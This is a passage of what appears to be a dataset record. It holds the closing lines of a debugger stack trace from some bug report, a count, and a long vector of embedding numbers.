rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #8 0x000055555556c45e in _start () ``` --- end body ---
5,977
[ -0.025887897238135338, 0.011474018916487694, -0.00737819354981184, 0.01654028333723545, 0.01444242149591446, 0.018053026869893074, -0.0196656696498394, 0.0411580465734005, -0.00749236298725009, 0.052546437829732895, -0.030140705406665802, 0.018295636400580406, 0.021363938227295876, 0.0013744918396696448, -0.00592610239982605, 0.013072389177978039, -0.015412860549986362, 0.020992888137698174, -0.024746203795075417, -0.006857295986264944, 0.0409867949783802, -0.028713589534163475, -0.04817946255207062, 0.03724774718284607, -0.022205937653779984, 0.03288077190518379, -0.018695229664444923, 0.006397050805389881, 0.00777778634801507, 0.009040785022079945, -0.012308881618082523, 0.02153519168496132, -0.015812452882528305, 0.014699302613735199, 0.05434460565447807, -0.0028132039587944746, 0.03379412367939949, 0.06062392145395279, -0.02229156345129013, 0.005936805624514818, -0.011688086204230785, -0.04837925732135773, -0.03430788591504097, 0.009725800715386868, -0.011780848726630211, 0.029741114005446434, -0.006272178143262863, 0.004174316301941872, -0.04849342629313469, 0.00749236298725009, 0.020907260477542877, -0.009561682119965553, -0.009533139877021313, -0.039902184158563614, 0.0004954771138727665, -0.04892156273126602, 0.03393683582544327, -0.002964835148304701, 0.00929766520857811, 0.011773712933063507, -0.016711536794900894, 0.021249769255518913, -0.020664650946855545, 0.0099684102460742, 0.015213064849376678, 0.009154953993856907, 0.008427124470472336, 0.006436296738684177, -0.022662613540887833, 0.0302263330668211, -0.01865241676568985, -0.04178597778081894, 0.015184522606432438, 0.0016402923502027988, 0.018124382942914963, -0.022377191111445427, 0.053117286413908005, 0.010532122105360031, -0.013043846935033798, 0.015484216623008251, -0.03941696509718895, 0.03379412367939949, -0.028071386739611626, 0.016440385952591896, 0.02664426900446415, 0.0176391638815403, -0.01935170404613018, -0.07392464578151703, -0.03282368555665016, -0.03213866800069809, 0.0008495804504491389, 0.0015287988353520632, -0.006821617949754, 0.004466875456273556, 0.007827735505998135, 0.001589451334439218, -0.028656505048274994, -0.018038755282759666, -0.05534358695149422, 0.0027953649405390024, -0.028856301680207253, -0.020878717303276062, -0.018424076959490776, 0.011252815835177898, -0.018609602004289627, -0.0031467925291508436, 0.016440385952591896, -0.0012629983248189092, 0.01584099605679512, 0.1444242149591446, 0.00019845842325594276, -0.0004620290419552475, 0.026558643206954002, 0.01337921991944313, 0.020136617124080658, 0.009897055104374886, -0.015412860549986362, -0.01190928928554058, -0.048978645354509354, -0.040587201714515686, 0.005776254925876856, -0.008298683911561966, -0.022248750552535057, 0.012308881618082523, -0.021435294300317764, 0.03647710382938385, -0.02045058272778988, -0.01832417957484722, -0.038931746035814285, -0.009069327265024185, -0.019908279180526733, -0.018795127049088478, 0.007299702148884535, -0.04623858258128166, 0.0017205675831064582, -0.000590023584663868, -0.034279342740774155, 0.03487873449921608, -0.000182291871169582, 0.021421022713184357, -0.05819782242178917, -0.041814520955085754, 0.03664835914969444, 0.01258003432303667, -0.009768614545464516, -0.0027311446610838175, -0.003706935793161392, 0.007342515513300896, -0.01504181046038866, -0.019337432458996773, -0.005123349372297525, -0.001849900116212666, 0.010004088282585144, 0.0007822383777238429, 0.05971056595444679, 0.0041778841987252235, 0.020364956930279732, 0.04495417699217796, -0.018181467428803444, -0.02528850920498371, -0.01929461769759655, -0.04452604427933693, 0.002831042977049947, -0.035991884768009186, -0.00484149344265461, -0.023904206231236458, 0.015384318307042122, 0.006168712396174669, -0.01156678143888712, 0.022719698026776314, 0.007342515513300896, -0.016240589320659637, 0.015370047651231289, 0.02740064263343811, -0.05000616982579231, -0.008833852596580982, 0.02082163281738758, 0.05325999855995178, -0.00766361691057682, -0.004720188677310944, -0.021877700462937355, 0.027942946180701256, -0.017896044999361038, 0.005134052596986294, 0.028913386166095734, -0.0228766817599535, 0.020978616550564766, -0.034079547971487045, 0.007413871586322784, -0.014563726261258125, 0.003557088552042842, -0.016939876601099968, -0.00039870073669590056, 0.009889919310808182, 0.04224265739321709, 0.005747712682932615, -0.029598401859402657, -0.010453630238771439, 0.02177780121564865, 0.007335380185395479, 0.014206947758793831, -0.010938850231468678, -0.005933237727731466, -0.004334867000579834, -0.019437329843640327, 0.007246185559779406, -0.006332830525934696, 0.03513561561703682, 0.02260552905499935, -0.010589206591248512, -0.014049964025616646, -0.005101942457258701, 0.00659684743732214, 0.005076967645436525, -0.01648319885134697, 0.0006114303250797093, -0.01545567438006401, 0.0021995436400175095, -0.032224297523498535, -0.017981670796871185, 0.013414897955954075, 0.01198064535856247, 0.042756419628858566, -0.038046933710575104, -0.05186142399907112, -0.01602652110159397, -0.02140675112605095, -0.00044307514326646924, -0.03379412367939949, 0.00669317739084363, 0.00029389685369096696, 0.00410296069458127, -0.014699302613735199, 0.018352720886468887, 0.01936597377061844, 0.021578004583716393, -0.006079517304897308, 0.0016831058310344815, -0.004730891901999712, 0.012494407594203949, -0.006932219490408897, 0.034393515437841415, -0.03054029867053032, -0.011402662843465805, 0.010988798923790455, 0.07637929171323776, -0.03916008397936821, 0.005726305767893791, -0.007278295233845711, 0.022248750552535057, -0.01756780780851841, -0.008398582227528095, 0.0007831302937120199, 0.0022566283587366343, -0.0026758438907563686, -0.008548429235816002, 0.00916208978742361, 0.0011666679056361318, -0.003426864044740796, 0.00016121959197334945, 0.018738042563199997, -0.03188178688287735, -0.02363305352628231, 0.03285222873091698, 0.03342307358980179, -0.013885846361517906, -0.011259951628744602, 0.013364948332309723, -0.009254852309823036, -0.046152956783771515, 0.019594313576817513, -0.018124382942914963, -0.023518884554505348, -0.028399623930454254, -0.003871054155752063, -0.007856277748942375, 0.016811436042189598, 0.01485628541558981, 0.015855267643928528, 0.006960762199014425, 0.0016402923502027988, 0.0018391967751085758, -0.003496436169371009, 0.031225314363837242, 0.005233950912952423, -0.015027539804577827, 0.02114987000823021, -0.004138638731092215, -0.008990835398435593, 0.010739053599536419, 0.02420390024781227, 0.022462816908955574, -0.028071386739611626, 0.016882792115211487, 0.011274222284555435, 0.026358846575021744, -0.018638145178556442, 0.011659543961286545, -0.01940878853201866, 0.020536210387945175, -0.019437329843640327, 0.0021442428696900606, -0.014699302613735199, 0.035478122532367706, -0.022719698026776314, -0.009989817626774311, -0.03188178688287735, 0.024503594264388084, -0.006304288282990456, 0.008384310640394688, 0.03213866800069809, -0.05137620493769646, -0.03787567839026451, -0.017710518091917038, -0.026801252737641335, -0.005587161984294653, -0.0215922761708498, -0.011516831815242767, -0.001252294983714819, 0.026287490501999855, -0.02025078609585762, -0.0008460126700811088, -0.030825721099972725, 0.004495417699217796, 0.035363953560590744, -0.038874659687280655, -0.01309379655867815, 0.030426129698753357, -0.11262805759906769, 0.01698268949985504, -0.007542312145233154, -0.02063610777258873, 0.0019283915171399713, -0.04526814445853233, 0.016839977353811264, -0.008676869794726372, -0.02785731852054596, 0.023461800068616867, 0.013579015620052814, 0.021692175418138504, -0.003566008061170578, 0.006932219490408897, 0.021578004583716393, 0.0062828813679516315, -0.02982673980295658, -0.01692560501396656, -0.0022102470975369215, -0.0010988798458129168, 0.01539858989417553, -0.00368909677490592, 0.0009775749640539289, 0.03847506642341614, 0.0135076604783535, 0.03576354682445526, 0.013336406089365482, -0.030882807448506355, -0.009597360156476498, -0.02747199684381485, 0.013550473377108574, -0.014378201216459274, 0.022191666066646576, -0.021449564024806023, -0.0066182538866996765, 0.016725808382034302, -0.007720701862126589, 0.0060117291286587715, 0.0050341542810201645, -0.017924586310982704, -0.012572898529469967, -0.011402662843465805, -0.028399623930454254, 0.04141492769122124, -0.031396567821502686, 0.006243635900318623, -0.005676357075572014, -0.006650364026427269, 0.0191090926527977, 0.017681976780295372, -0.03168199211359024, 0.014363930560648441, -0.04338435083627701, 0.039188627153635025, 0.03419371694326401, -0.07843434065580368, 0.0030040808487683535, 0.012879728339612484, -0.012915406376123428, 0.057969484478235245, -0.015855267643928528, -0.021563734859228134, -0.04329872131347656, 0.03793276473879814, -0.03881757706403732, -0.0655902847647667, -0.02190624177455902, 0.009062191471457481, -0.03447914123535156, -0.03353724256157875, 0.01366464328020811, -0.04038740321993828, 0.034793104976415634, -0.014021421782672405, -0.01258003432303667, 0.02554539032280445, 0.011631001718342304, 0.035735003650188446, 0.014642218127846718, -0.014128455892205238, 0.025716643780469894, -0.015741098672151566, 0.0363914780318737, -0.028014302253723145, -0.00330555927939713, 0.012080543674528599, 0.02613050863146782, 0.018352720886468887, -0.0056799245066940784, 0.021806344389915466, -0.035735003650188446, 0.042385369539260864, -0.02164936065673828, -0.0005106402095407248, 0.01133844256401062, 0.013557609170675278, 0.013728863559663296, 0.04543939605355263, 0.0005200056475587189, 0.013992879539728165, 0.057655517011880875, -0.02567383088171482, -0.005601433105766773, -0.029427148401737213, -0.01769624836742878, 0.00646840687841177, 0.0016643749549984932, -0.03333744779229164, -0.022833868861198425, -0.03844652697443962, -0.021578004583716393, -0.012644254602491856, -0.03410809114575386, 0.04529668763279915, -0.026430202648043633, -0.0007804544875398278, 0.02829972468316555, -0.024189628660678864, -0.022519903257489204, 0.015826724469661713, 0.028342539444565773, -0.03188178688287735, -0.009440377354621887, 0.04492563381791115, 0.006746694445610046, -0.006425593048334122, 0.005023451056331396, -0.000663609302137047, -0.027115218341350555, -0.020150888711214066, 0.03973092883825302, 0.03524978458881378, 0.007749244105070829, 0.02822836861014366, 0.004552502650767565, 0.00013646803563460708, 0.0314251109957695, 0.034079547971487045, 0.001448523486033082, -0.010439358651638031, 0.009012242779135704, -0.017153942957520485, 0.0107961380854249, 0.01108156144618988, 0.035363953560590744, 0.019337432458996773, 0.0074352785013616085, 0.015370047651231289, 0.005876153241842985, 0.007463820744305849, -0.008990835398435593, -0.03633439168334007, 0.003746181493625045, -0.03342307358980179, -0.0026508693117648363, 0.003360860049724579, 0.002752551343291998, -0.0005378446076065302, -0.02607342228293419, -0.0031360890716314316, -0.004370545037090778, -0.002629462629556656, 0.008655463345348835, 0.0008036451181396842, -0.007799193263053894, -0.011110103689134121, 0.021421022713184357, -0.005151891615241766, -0.015441403724253178, 0.009154953993856907, 0.03953113406896591, 0.02516006864607334, -0.001709864242002368, -0.03159636631608009, 0.016269130632281303, -0.005472992546856403, 0.023675866425037384, -0.03373704105615616, -0.03302348032593727, 0.025017356500029564, 0.008455666713416576, -0.02484610304236412, -0.006771668791770935, -0.029027555137872696, 0.003373347222805023, -0.029626943171024323, -0.010582070797681808, -0.031225314363837242, 0.02447505295276642, -0.019251804798841476, 0.02822836861014366, 0.013814490288496017, -0.0018855780363082886, -0.0027846614830195904, 0.002581297419965267, 0.017325198277831078, 0.012473000213503838, 0.016882792115211487, 0.0003427310148254037, -0.01928034797310829, 0.012251797132194042, 0.0014708222588524222, 0.002706170082092285, -0.006864431779831648, -0.0323384664952755, 0.017724789679050446, -0.008855259045958519, 0.002495670458301902, 0.006514788139611483, 0.017681976780295372, -0.0022191666066646576, -0.011102968826889992, -0.008355768397450447, 0.05851178616285324, -0.020536210387945175, 0.01411418430507183, -0.02901328355073929, 0.04235682636499405, 0.0009374373476020992, 0.011402662843465805, 0.0000015400039501400897, 0.0029327250085771084, -0.006600414868444204, -0.0033376694191247225, 0.0015644767554476857, 0.0019480143673717976, 0.0004341556632425636, 0.0026704922784119844, -0.006521923467516899, 0.01437106542289257, 0.005501535255461931, 0.0293129775673151, 0.007185532711446285, 0.0008727710810489953, 0.000058645578974392265, -0.015612657181918621, -0.008948022499680519, -0.01826709508895874, -0.012308881618082523, 0.0330805666744709, -0.03353724256157875, 0.009012242779135704, -0.003756884951144457, -0.0016153177712112665, 0.01743936724960804, 0.0024153951089829206, -0.016939876601099968, 0.012194712646305561, -0.019637126475572586, -0.018352720886468887, -0.029398605227470398, 0.002816771622747183, -0.009026513434946537, -0.03182470425963402, -0.023533156141638756, 0.021007157862186432, 0.006778804585337639, -0.03462185338139534, -0.005348119884729385, 0.02971257083117962, -0.008983699604868889, -0.01444242149591446, -0.00802039634436369, -0.005537212826311588, -0.023604510352015495, -0.018923567607998848, 0.005547916516661644, -0.012958220206201077, 0.002224518219009042, -0.0013958985218778253, 0.0064969491213560104, -0.008377175778150558, -0.026159049943089485, 0.04406936466693878, -0.009154953993856907, -0.045838989317417145, -0.023861391469836235, 0.014813471585512161, 0.01685424894094467, -0.007406735792756081, -0.033879753202199936, 0.04561065137386322, 0.023347629234194756, 0.022205937653779984, 0.04663817584514618, -0.010039766319096088, 0.012208984233438969, 0.004766569938510656, 0.018167195841670036, 0.005893992260098457, -0.0017633811803534627, 0.02440369687974453, 0.02032214216887951, -0.04018760845065117, 0.012159034609794617, -0.009497461840510368, 0.02675843983888626, 0.042014315724372864, 0.012323153205215931, -0.02414681576192379, -0.011381256394088268, -0.013885846361517906, -0.04132930189371109, 0.0395025908946991, -0.0057013314217329025, -0.04917844384908676, -0.050434306263923645, 0.018095839768648148, 0.03390829265117645, 0.0011613162932917476, -0.029798198491334915, -0.014092777855694294, -0.0006439864519052207, 0.02096434496343136, -0.02721511572599411, 0.02433234080672264, -0.02760043740272522, 0.021963326260447502, 0.02956985868513584, -0.007542312145233154, 0.03339453041553497, 0.018438348546624184, -0.036048971116542816, -0.01578391157090664, 0.011837933212518692, 0.01615496166050434, 0.021121328696608543, -0.010453630238771439, 0.04926406964659691, 0.0440979078412056, 0.00861978530883789, -0.025830812752246857, -0.009782885201275349, -0.03739045932888985, -0.017796145752072334, -0.006254339125007391, 0.012401645071804523, -0.010303783230483532, -0.0220489539206028, -0.013964337296783924, -0.0047879768535494804, 0.009947003796696663, 0.004370545037090778, -0.016083605587482452, 0.022091766819357872, 0.022148851305246353, -0.0041172318160533905, -0.028057115152478218, 0.014577997848391533, 0.014642218127846718, -0.01762489229440689, 0.006218661088496447, -0.005612136796116829, -0.0038567830342799425, 0.007813463918864727, -0.009433241561055183, -0.03576354682445526, 0.015198793262243271, -0.003310910891741514, -0.004991340916603804, -0.03276659920811653, -0.022263022139668465, 0.021706445142626762, -0.013158016838133335, 0.026230406016111374, 0.05266060680150986, 0.013179423287510872, -0.04041594639420509, 0.024803290143609047, -0.011010205373167992, 0.003742613596841693, 0.00578339071944356, -0.03282368555665016, 0.0019016331061720848, 0.006004593800753355, -0.014478099532425404, -0.00013880940969102085, 0.016654452309012413, -0.003500003833323717, 0.012230390682816505, 0.010310919024050236, -0.020607566460967064, -0.006614685989916325, 0.008056074380874634, -0.023019393905997276, 0.009504597634077072, 0.005173298064619303, -0.01699696108698845, -0.0018079784931614995, 0.01041081640869379, -0.0010025495430454612, 0.025145797058939934, -0.014164133928716183, 0.0006627173279412091, -0.035164155066013336, -0.030140705406665802, -0.014192676171660423, -0.00996127538383007, 0.002693682909011841, 0.024988815188407898, -0.004709485452622175, 0.004206426441669464, -0.009897055104374886, -0.040473032742738724, 0.022634072229266167, -0.0019212559564039111, -0.01319369487464428, -0.024689119309186935, 0.011302764527499676, -0.002518861088901758, 0.00792049802839756, 0.02319064736366272, 0.010089715011417866, 0.02045058272778988, 0.010938850231468678, -0.038046933710575104, 0.01576963998377323, -0.005647814366966486, 0.014178404584527016, -0.01527014933526516, -0.03282368555665016, 0.04172889515757561, 0.012194712646305561, 0.03513561561703682, 0.025573931634426117, -0.01229461096227169, -0.014549455605447292, -0.007528041023761034, 0.020393498241901398, -0.014606540091335773, 0.005027018953114748, -0.024674849584698677, -0.009468919597566128, -0.002440369687974453, -0.0034001057501882315, -0.01685424894094467, 0.00018273784371558577, -0.022848138585686684, 0.00437411293387413, -0.009354750625789165, 0.02670135535299778, -0.002233437728136778, 0.01942305825650692, -0.03633439168334007, -0.00021161464974284172, 0.004020901396870613, 0.008762496523559093, -0.023105019703507423, 0.0032895042095333338, 0.034136634320020676, 0.004092257469892502, 0.015155980363488197, -0.03776150941848755, 0.012829779647290707, -0.03681961074471474, 0.022020410746335983, 0.018566789105534554, -0.009333343245089054, 0.033451616764068604, -0.01960858516395092, 0.003574927570298314, 0.0022833868861198425, -0.00015709434228483588, -0.0026776278391480446, 0.05226101726293564, -0.010517850518226624, 0.0016215613577514887, -0.015484216623008251, 0.00344827095977962, 0.01542713213711977, -0.025859355926513672, -0.019394516944885254, 0.017739061266183853, 0.00381753733381629, -0.02767179347574711, -0.01870950125157833, -0.018309907987713814, -0.027628980576992035, -0.022776782512664795, 0.015955165028572083, -0.020850175991654396, -0.0008968536858446896, -0.010867494158446789, 0.014742116443812847, 0.0059118312783539295, 0.0017312710406258702, 0.012330288998782635, -0.010360867716372013, 0.011966373771429062, -0.028699317947030067, -0.012230390682816505, 0.023404715582728386, -0.02875640243291855, 0.0009436809341423213, -0.0004718404670711607, -0.05354541912674904, 0.01731092669069767, -0.03659127280116081, -0.006379211787134409, 0.0188379418104887, 0.039902184158563614, 0.003250258509069681, 0.0014387121191248298, -0.02702959068119526, 0.002042560838162899, 0.009276258759200573, -0.020736007019877434, 0.035620834678411484, -0.0024350180756300688, -0.00224414118565619, -0.019151907414197922, 0.008298683911561966, -0.03176761791110039, -0.02133539505302906, 0.004249240271747112, -0.02868504635989666, -0.022134581580758095, -0.03998780995607376, -0.004820086993277073, -0.01743936724960804, 0.024931728839874268, -0.014456693083047867, 0.024574950337409973, 0.02780023403465748, -0.001448523486033082, 0.04421207681298256, -0.011902153491973877, 0.01319369487464428, -0.01322223711758852, -0.020036719739437103, 0.018623873591423035, -0.009276258759200573, 0.01015393529087305, 0.010974528267979622, -0.02574518695473671, -0.010118258185684681, 0.01655455492436886, 0.020165160298347473, -0.0003690434677992016, -0.04209994524717331, -0.004556070081889629, -0.026729896664619446, -0.006304288282990456, -0.01821001060307026, 0.007178397383540869, 0.03228138014674187, -0.019637126475572586, 0.0008268357487395406, 0.00605454295873642, -0.0025973524898290634, 0.012387373484671116, 0.015341505408287048, -0.013750270009040833, 0.020336413756012917, 0.010346596129238605, 0.013058118522167206, 0.018937839195132256, -0.005569322966039181, 0.020850175991654396, -0.03185324743390083, -0.03159636631608009, 0.018381264060735703, -0.0037818592973053455, -0.03713357821106911, -0.04241390898823738, 0.002358310390263796, 0.03590625897049904, 0.04167180880904198, 0.010910307988524437, -0.012829779647290707, -0.01806729845702648, -0.013108067214488983, -0.003753317054361105, 0.00023725816572550684, -0.005844043102115393, 0.009904189966619015, -0.024118272587656975, 0.012629983015358448, 0.035049986094236374, 0.022091766819357872, -0.015384318307042122, 0.020921532064676285, 0.008427124470472336, -0.004652400501072407, -0.006314991507679224, -0.027229387313127518, -0.011730900034308434, -0.005715602543205023, -0.03208158537745476, 0.009197767823934555, 0.00608308520168066, 0.06165144219994545, 0.010268105193972588, -0.006018864922225475, -0.004224265459924936, 0.03522124141454697, -0.005308874417096376, -0.008940886706113815, -0.029141724109649658, 0.014007151126861572, -0.0014610107755288482, 0.024175357073545456, -0.0030825722496956587, -0.021734988316893578, -0.02471766248345375, 0.022191666066646576, 0.04172889515757561, -0.00262054312042892, -0.0171824861317873, -0.0014636865817010403, -0.011738034896552563, -0.05317436903715134, -0.010432223789393902, 0.025388406589627266, 0.03493581712245941, -0.0196656696498394, -0.009989817626774311, 0.03202449902892113, 0.0008286196389235556, -0.021249769255518913, -0.01999390497803688, -0.028827758505940437, -0.04075845330953598, -0.04292767122387886, -0.006061678286641836, -0.01975129544734955, -0.020150888711214066, 0.02758616767823696, -0.01960858516395092, -0.010646291077136993, -0.010753325186669827, 0.018038755282759666, 0.022848138585686684, 0.025145797058939934, -0.04384102672338486, -0.022205937653779984, 0.01642611436545849, 0.0033715632744133472, -0.04172889515757561, -0.005879721138626337, -0.025859355926513672, -0.03290931135416031, -0.00524108624085784, -0.007114177104085684, 0.03225283697247505, 0.04592461884021759, -0.019979635253548622, 0.03131094202399254, -0.00820592138916254, -0.04041594639420509, -0.007513769902288914, 0.0043883840553462505, -0.0041172318160533905, -0.010054037906229496, 0.044240619987249374, -0.018381264060735703, -0.006996439769864082, -0.025088712573051453, 0.014927641488611698, 0.022334376350045204, -0.020008176565170288, -0.012330288998782635, 0.01948014460504055, 0.007756379432976246, 0.0036409315653145313, -0.036762528121471405, 0.039131540805101395, -0.01929461769759655, -0.003366211662068963, -0.02217739447951317, -0.019194720312952995, -0.037219204008579254, -0.03890320286154747, -0.0071034738793969154, 0.015312963165342808, 0.0025224287528544664, -0.018509704619646072, 0.008648327551782131, 0.005340984556823969, 0.03239554911851883, -0.017924586310982704, -0.01890929788351059, -0.024760475382208824, 0.006026000715792179, 0.01048217248171568, 0.008769632317125797, -0.004106528591364622, -0.017282383516430855, -0.024104002863168716, 0.016597367823123932, 0.010268105193972588, 0.03193887323141098, -0.03764734044671059, 0.0005686168442480266, -0.011388391256332397, -0.0026080559473484755, 0.008091752417385578, 0.022519903257489204, -0.0017758684698492289, -0.012180441059172153, 0.018509704619646072, 0.02306220680475235, 0.011673814617097378, 0.013314999639987946, -0.002752551343291998, -0.00014594498497899622, -0.005173298064619303, -0.01942305825650692, 0.023989832028746605, -0.018281364813447, -0.021877700462937355, 0.0005048425518907607, 0.042956214398145676, 0.002838178537786007, -0.050177425146102905, -0.01564119942486286, -0.005294603295624256, 0.019522957503795624, 0.014249760657548904, 0.007028549909591675, 0.011716628447175026, -0.025374136865139008, 0.03279514238238335, -0.0155270304530859, 0.05097661167383194, -0.02319064736366272, -0.015213064849376678, -0.005979618988931179, -0.0018677390180528164, -0.021007157862186432, 0.023333359509706497, -0.01853824593126774, -0.009183496236801147, -0.006825185846537352, 0.00737819354981184, -0.022976579144597054, -0.02217739447951317, -0.03898882865905762, -0.011124375276267529, 0.008127429522573948, -0.004206426441669464, 0.007413871586322784, 0.009775749407708645, 0.011152917519211769, -0.01858106069266796, -0.01922326348721981, 0.02311929129064083, -0.010503578931093216, 0.021092785522341728, -0.011388391256332397, -0.004459739662706852, -0.011145781725645065, -0.01615496166050434, -0.012023458257317543, -0.01325077936053276, 0.027942946180701256, -0.050634101033210754, 0.018880754709243774, 0.011345578357577324, -0.037333372980356216, 0.01628340221941471, -0.014064235612750053, -0.019565770402550697, -0.01923753321170807, 0.007827735505998135, -0.01872377097606659, -0.022634072229266167, 0.019394516944885254, 0.024432238191366196, 0.08003270626068115, 0.02311929129064083, -0.016212046146392822, -0.029940908774733543, -0.003878189716488123, 0.0022923063952475786, 0.0034036734141409397, 0.010396545752882957, 0.011167188175022602, 0.0258165430277586, 0.0317961610853672, -0.0072854310274124146, 0.015184522606432438, 0.0191090926527977, 0.01188074704259634, 0.006910813041031361, -0.014121320098638535, -0.0228766817599535, -0.0005387365818023682, -0.003953113220632076, 0.008191649802029133, 0.00329842371866107, 0.01725384220480919, -0.019337432458996773, 0.014563726261258125, -0.026358846575021744, -0.0007001791382208467, -0.033508703112602234, -0.03582062944769859, -0.012829779647290707, -0.00025888788513839245, -0.008833852596580982, -0.02025078609585762, 0.0014387121191248298, 0.021164141595363617, -0.0014601188013330102, 0.003293071873486042, -0.0011318819597363472, 0.006008161697536707, -0.007149855140596628, 0.007181965280324221, -0.006721720099449158, -0.013807354494929314, 0.006532627157866955, 0.008127429522573948, -0.027315014973282814, 0.030711552128195763, 0.0057869586162269115, -0.028927655890583992, -0.0005191137315705419, -0.0008848123834468424, -0.031196773052215576, 0.022448547184467316, 0.02956985868513584, 0.005098374560475349, 0.02216312289237976, -0.00047942204400897026, -0.012829779647290707, -0.005405204836279154, -0.015997977927327156, -0.014107049442827702, 0.01108156144618988, -0.009540275670588017, 0.010503578931093216, 0.0014850933803245425, -0.012473000213503838, -0.009019377641379833, -0.0016063982620835304, -0.008948022499680519, 0.021235497668385506, 0.016397571191191673, -0.011131511069834232, -0.007799193263053894, 0.0032181483693420887, 0.00763507466763258, 0.00958308856934309, -0.008776768110692501, 0.012715610675513744, -0.02797148935496807, -0.014542319811880589, 0.029427148401737213, 0.016454655677080154, 0.007271159905940294, 0.021007157862186432, -0.020093804225325584, 0.02447505295276642, -0.009561682119965553, -0.0031414406839758158, 0.007963311858475208, -0.004770137835294008, 0.005472992546856403, 0.004652400501072407, 0.005415908060967922, 0.021891970187425613, 0.004099392797797918, 0.02069319225847721, -0.006564737297594547, -0.013443440198898315, -0.01949441432952881, -0.014406743459403515, 0.0232477318495512, 0.0004551164456643164, 0.021506650373339653, 0.010339461266994476, -0.013586151413619518, 0.010325189679861069, 0.0026687083300203085, 0.012722745537757874, -0.009247716516256332, -0.008926615118980408, -0.047180481255054474, -0.013086660765111446, 0.0012389157200232148, -0.0176391638815403, -0.01890929788351059, 0.017196757718920708, 0.006500517018139362, 0.0062828813679516315, -0.011124375276267529, -0.02420390024781227, -0.01870950125157833, -0.005551484413444996, 0.023618781939148903, -0.010617748834192753, -0.011231408454477787, 0.007977582514286041, 0.013058118522167206, -0.02311929129064083, 0.02740064263343811, 0.03365141153335571, 0.0330805666744709, 0.022091766819357872, 0.001383411348797381, -0.016697265207767487, 0.016825705766677856, -0.03188178688287735, 0.029684027656912804, 0.014413879252970219, 0.0022887384984642267, -0.0010177126387134194, 0.02017943002283573, 0.037219204008579254, 0.03002653643488884, 0.016012249514460564, -0.004545366857200861, 0.007856277748942375, 0.023975562304258347, 0.009433241561055183, 0.013265050016343594, 0.014064235612750053, 0.001983692403882742, -0.027942946180701256, 0.026915421709418297, 0.050377219915390015, 0.0012433754745870829, 0.00013000141188967973, 0.01149542536586523, -0.0310540609061718, 0.0028934793081134558, 0.011809390969574451, -0.002440369687974453, 0.03596334159374237, 0.020850175991654396, -0.014842013828456402, -0.008412852883338928, 0.028927655890583992, -0.0022155987098813057, -0.03981655836105347, -0.0021424589212983847, -0.02607342228293419, -0.003921003080904484, 0.0048700361512601376, -0.027115218341350555, -0.0011416934430599213, 0.01395720150321722, 0.012437322176992893, -0.0059724836610257626, -0.0008290656260214746, 0.016083605587482452, -0.016126418486237526, 0.0014957967214286327, 0.02611623704433441, 0.01615496166050434, 0.0029434282332658768, 0.021492378786206245, -0.009461783803999424, -0.0018338450463488698, 0.014171269722282887, -0.026144778355956078, 0.025916440412402153, 0.009975546039640903, 0.03796130418777466, -0.03279514238238335, -0.017796145752072334, -0.020521938800811768, -0.013072389177978039, 0.003227067878469825, -0.0005538996774703264, -0.002979106269776821, 0.008106023073196411, 0.00004390056346892379, -0.0016759702702984214, -0.007742108311504126, 0.012066272087395191, -0.02223447896540165, -0.03616314008831978, 0.009433241561055183, 0.01736801117658615, -0.011067290790379047, -0.006850160658359528, -0.017082586884498596, 0.013236507773399353, 0.012851186096668243, -0.005451586097478867, -0.0070392535999417305, 0.008255870081484318, 0.012080543674528599, -0.02662999927997589, 0.014941912144422531, 0.018366992473602295, -0.03853215277194977, 0.026786981150507927, 0.020921532064676285, -0.002383284969255328, -0.004980637691915035, -0.00381753733381629, 0.015698283910751343, -0.017924586310982704, -0.019066279754042625, 0.004795112181454897, -0.008512751199305058, 0.022134581580758095, 0.020093804225325584, -0.00007001791527727619, -0.007196236401796341, -0.00368909677490592, -0.013072389177978039, 0.006839456968009472, 0.00820592138916254, -0.011331306770443916, -0.002249492798000574, 0.003221716033294797, -0.02070746384561062, -0.008298683911561966, -0.014927641488611698, -0.00016266900638584048, 0.01123854424804449, -0.0008165783947333694, -0.01731092669069767, 0.030568841844797134, -0.008655463345348835, 0.009911325760185719, -0.015241607092320919, -0.024632034823298454, 0.0052446541376411915, 0.03690524026751518, 0.01648319885134697, 0.012351695448160172, 0.02140675112605095, 0.010789002291858196, 0.0002564350434113294, -0.00237971730530262, -0.004862900357693434, 0.018866483122110367, -0.01949441432952881, 0.04035886004567146, -0.013429168611764908, -0.0019355270778760314, -0.004381248261779547, 0.006093788426369429, 0.018181467428803444, -0.0005391825689002872, -0.00814883690327406, 0.008769632317125797, -0.012273204512894154, 0.01411418430507183, -0.010803273878991604, -0.0144709637388587, -0.002053264295682311, -0.0001514081668574363, 0.0026151915080845356, 0.04389811307191849, -0.0023279841989278793, -0.01942305825650692, 0.004363409709185362, -0.009782885201275349, -0.04050157219171524, -0.010888900607824326, -0.020222244784235954, -0.0020800225902348757, 0.020336413756012917, 0.007592261303216219, -0.019822651520371437, -0.022534172981977463, 0.0253598652780056, -0.0036569866351783276, -0.01622631773352623, 0.03984510153532028, -0.018866483122110367, 0.017153942957520485, 0.017482180148363113, 0.01788177341222763, 0.01960858516395092, 0.009989817626774311, -0.014613675884902477, 0.005287467502057552, -0.01012539304792881, 0.002233437728136778, 0.010189613327383995, -0.009925597347319126, -0.002294090110808611, -0.029741114005446434, -0.018038755282759666, -0.02752908132970333, 0.008969428949058056, 0.0043883840553462505, 0.015612657181918621, 0.001309379586018622, 0.004559637978672981, -0.0064969491213560104, -0.0011773713631555438, -0.0021460268180817366, -0.015626927837729454, -0.03279514238238335, -0.004677375312894583, -0.01723957061767578, -0.006129466462880373, 0.007306837942451239, 0.008127429522573948, -0.022205937653779984, 0.022905223071575165, 0.025730915367603302, 0.04132930189371109, -0.002574161859229207, 0.013272185809910297, -0.019522957503795624, 0.01449950598180294, 0.0027882293798029423, -0.012287475168704987, 0.007110609207302332, -0.017268111929297447, 0.03770442306995392, -0.008812446147203445, -0.004873603582382202, 0.022020410746335983, 0.009247716516256332, -0.0002711521810851991, -0.0009579521138221025, 0.011780848726630211, -0.013500524684786797, -0.00763507466763258, -0.0305973831564188, -0.01175230648368597, 0.006521923467516899, -0.0007987394346855581, 0.024817559868097305, 0.007870549336075783, -0.007321109063923359, 0.0000890833034645766, -0.01723957061767578, -0.019851194694638252, 0.019979635253548622, -0.0066789062693715096, -0.015612657181918621, 0.011688086204230785, 0.014107049442827702, -0.010846087709069252, -0.0035053554456681013, 0.002037209225818515, -0.02945568971335888, -0.0068037789314985275, 0.004873603582382202, 0.004581044893711805, 0.012044865638017654, -0.011780848726630211, 0.002158513991162181, 0.007585125509649515, 